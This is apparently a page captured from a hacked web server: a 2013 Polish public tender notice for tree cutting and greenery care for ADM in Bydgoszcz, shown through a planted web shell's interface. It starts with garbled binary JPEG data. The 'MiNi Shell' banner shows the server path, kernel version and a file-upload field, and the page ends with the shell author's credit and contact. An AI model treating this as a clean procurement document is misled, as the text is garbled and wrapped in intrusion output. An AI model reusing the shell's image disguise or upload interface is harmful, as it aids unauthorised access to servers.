JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130306/91628-N-2013.html

<p class="kh_header"><b>Bydgoszcz: sprawa 13/P/2013  Wybór usługodawcy w zakresie wykonywania cięć pielęgnacyjnych, wycinki drzew, pielęgnacji zieleni dla Administracji Domów Miejskich ADM Sp. z o.o. w Bydgoszczy</b><br>
<b>Numer ogłoszenia: 91628 - 2013; data zamieszczenia: 06.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Domów Miejskich "ADM" Spółka z o.o. , ul. Śniadeckich 1, 85-011 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3481600, faks 052 3481607.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.adm.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> sprawa 13/P/2013  Wybór usługodawcy w zakresie wykonywania cięć pielęgnacyjnych, wycinki drzew, pielęgnacji zieleni dla Administracji Domów Miejskich ADM Sp. z o.o. w Bydgoszczy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług w zakresie wykonywania cięć pielęgnacyjnych, wycinki drzew, pielęgnacji zieleni dla Administracji Domów Miejskich ADM Sp. z o.o. w Bydgoszczy w okresie 12 miesięcy od dnia zawarcia umowy
Usługa polega na wykonaniu następujących czynności:
-	pielęgnacja zieleni;
-	wycinka drzew;
-	prześwietlanie drzew;
-	cięcie interwencyjne;
-	wywóz biomasy;
-	nasadzenia drzew i krzewów
-	rekultywacja terenów;
-	zagospodarowanie terenów.
Wszystkie czynności wykonawca powinien wykonać z należytą starannością, przy wykorzystaniu posiadanej wiedzy, zgodnie z obowiązującymi przepisami prawa, a także powinien chronić interesy Zamawiającego w toku realizacji powierzonych obowiązków..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.00.00.00-0, 77.21.11.00-3, 77.21.14.00-6, 77.21.15.00-7, 77.21.16.00-8, 77.31.00.00-6, 90.72.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeśli Wykonawca wykaże, iż                     w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie  zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  -  w tym okresie -  WYKONAŁ  lub  WYKONUJE   co  najmniej: 
-	1 usługę polegającą na nasadzeniach drzew lub krzewów na kwotę min. 30 tys. brutto
-	1 usługę polegającą na wycince drzew lub cięciach pielęgnacyjnych drzew lub krzewów na kwotę minimum 60 tys. brutto,
-	1 usługę polegającą na wycince lub prześwietleniach drzew przy użyciu ekipy alpinistycznej  (z wyłączeniem pracy podnośnika)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje:
-	co najmniej 2 osobami posiadającymi uprawnienia drwala - operatora pilarki z minimum rocznym doświadczeniem na tym stanowisku 
-	1 osobą nadzorującą prace bezpośrednio w terenie i uprawnioną do kontaktów z Zamawiającym w sprawie realizacji usług stanowiących przedmiot niniejszego postępowania tzw. kierownik prac, posiadający wykształcenie co najmniej średnie ogrodnicze lub leśne lub rolnicze oraz  co najmniej   3-letnie  doświadczenie zawodowe na tym stanowisku w zakresie utrzymania i pielęgnacji zieleni.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>7.1.  W celu wykazania spełniania warunków udziału w postępowaniu, określonych w art. 22 ust.1 ustawy Pzp Wykonawca  składa  wraz  z  ofertą  niżej  wymienione  dokumenty  i  oświadczenia: 
7.1.1.  oświadczenie wykonawcy o spełnieniu warunków udziału  w postępowaniu - według wzoru stanowiącego załącznik nr 2  do  SIWZ,
7.1.2.  wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz  z informacjami na temat  ich kwalifikacji zawodowych i doświadczenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności  oraz informacją  o podstawie  dysponowania tymi osobami - według wzoru stanowiącego załącznik nr 4 do SIWZ 
7.1.3.   wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy -   w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane - według  wzoru stanowiącego załącznik  nr 5  do  SIWZ  oraz załączenie dowodów, czy zostały wykonane lub są wykonywane należycie.  
UWAGA:
-  w przypadku gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa  w pkt.7.1.3. SIWZ ,  zostały  wcześniej wykonane,  wykonawca nie ma obowiązku przedkładania dowodów,
-  wykonawca w miejsce dowodów (poświadczeń), o których mowa w par.1 ust.2 pkt.1  Rozporządzenia Prezesa Rady Ministrów  z dnia 19.02.2013 r.  w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane - Wykonawca może przedkładać dokumenty potwierdzające należyte wykonanie dostaw, określone w par.1 ust.1 pkt.3  Rozporządzenia Prezesa Rady Ministrów  z dnia 30.12.2009 r.  w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane.
7.2. W celu wykazania braku podstaw  do wykluczenia z postępowania o udzielenie zamówienia w  okolicznościach, o  których  mowa  w art. 24  ust.1   ustawy  Pzp  należy  przedłożyć : 
7.2.1. oświadczenie  o niespełnieniu przesłanek  do wykluczenia z postępowania - według wzoru stanowiącego załącznik nr 3 do niniejszej  SIWZ 
UWAGA:
-  w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców (np. konsorcjum, spółka cywilna ) do oferty muszą być załączone wszystkie  wymienione dokumenty,  o których mowa  w pkt.7.2. -  wystawione  osobno  dla  każdego  Wykonawcy   (członka  konsorcjum, wspólnika spółki cywilnej  itp.).  
W związku z powyższym dokumenty w celu wykazania braku podstaw do wykluczenia z postępowania - muszą złożyć oddzielnie wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia  np.  wszyscy uczestnicy konsorcjum lub wspólnicy spółki cywilnej.   
Dla przykładu: nie jest więc skuteczne złożenie przez konsorcjum lub spółkę cywilną  jednego wspólnego oświadczenia o nie podleganiu wykluczeniu z postępowania. Każdy ze wspólników/uczestników spółki cywilnej/konsorcjum  musi przedłożyć oświadczenie, dotyczące wyłącznie jego osoby. 
7.3.Ponadto  wykonawca  zobowiązany  jest  złożyć  wraz  z  OFERTĄ  następujące  dokumenty:
7.3.1.   Podział ceny na składniki  (formularz cenowy)  -  według wzoru określonego załącznikiem nr 6  do SIWZ   (w  oryginale)                
7.3.2.   Listę  podmiotów należących do tej  samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt.5, albo informacje o tym,   że  nie  należy do  grupy  kapitałowej.
7.3.3.   w  przypadku jeżeli Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu polega na zasobach  innych  podmiotów  -  pisemne  zobowiązanie  innych podmiotów do oddania do dyspozycji zasobów niezbędnych do realizacji zamówienia, na okres korzystania z nich przy wykonaniu zamówienia  (w  oryginale)
7.3.4.  w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo                o którym mowa  w  pkt.7.6. ust.1)  niniejszej SIWZ   (w oryginale lub notarialnie poświadczonej za zgodność  z oryginałem kopii )
7.3.5.  przypadku składania oferty przez pełnomocnika Wykonawcy - pełnomocnictwo do reprezentowania wykonawcy przez Pełnomocnika   ( w oryginale lub notarialnie poświadczonej za zgodność   z oryginałem kopii )
7.3.6 Formularz oferty zgodnie z załącznikiem nr 1 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ustawy Zamawiający przewiduje możliwość zmiany umowy  w  następujących przypadkach: 
1)	wynagrodzenie należne wykonawcy  podlega automatycznej  zmianie do zmiany wysokości podatku VAT obowiązującej w chwili powstania obowiązku podatkowego. W takim przypadku wysokość  wynagrodzenia należnego wykonawcy ustalana jest każdorazowo z uwzględnieniem  aktualnej stawki podatku VAT obowiązującej  na dzień  wystawienia faktury (powstania  obowiązku podatkowego).  W takich przypadkach zmiana wynagrodzenia należnego wykonawcy nie wymaga złożenia  dodatkowego zgodnego oświadczenia  woli stron  o ustaleniu tego wynagrodzenia w nowej wysokości tj. nie jest  wymagane zawarcie aneksu do umowy. 
2)	w przypadku konieczności wydłużenia terminu realizacji umowy wywołanej ważnymi zdarzeniami niemożliwymi do przewidzenia w chwili podpisania umowy jednak nie dłużej niż o jeden miesiąc.                   W takim przypadku zmiana dokonuje się po pisemnym powiadomieniu zamawiającego przez wykonawcę o ich zaistnieniu, przynajmniej na 7 dni przed upływem terminu określonego w umowie, w drodze stosownego dwustronnie podpisanego aneksu
2.  W przypadku wystąpienia okoliczności stanowiących podstawę do zmian postanowień umowy Wykonawca zobowiązany jest do niezwłocznego -  jednak nie później przed upływem terminu obowiązywania umowy  - poinformowania o tym fakcie Zamawiającego i wystąpienia o dokonanie zmian  w przedmiotowej  umowie.
3. Jeżeli Zamawiający uzna, że zaistniałe okoliczności stanowiące podstawę do zmiany w umowie                              nie są zasadne, Wykonawca zobowiązany jest do realizacji zamówienia zgodnie z warunkami zawartymi  w SIWZ    i   umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.adm.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Domów Miejskich ADM Sp. z o.o. 
         	Dział  Zamówień Publicznych  
          	85-005 Bydgoszcz  ul. Gdańska 9   (2 piętro, pokój 2).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.03.2013 godzina 09:00, miejsce: Administracja Domów Miejskich ADM Sp. z o.o. 
         	Dział  Zamówień Publicznych  
          	85-005 Bydgoszcz  ul. Gdańska 9   (2 piętro, pokój 2).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com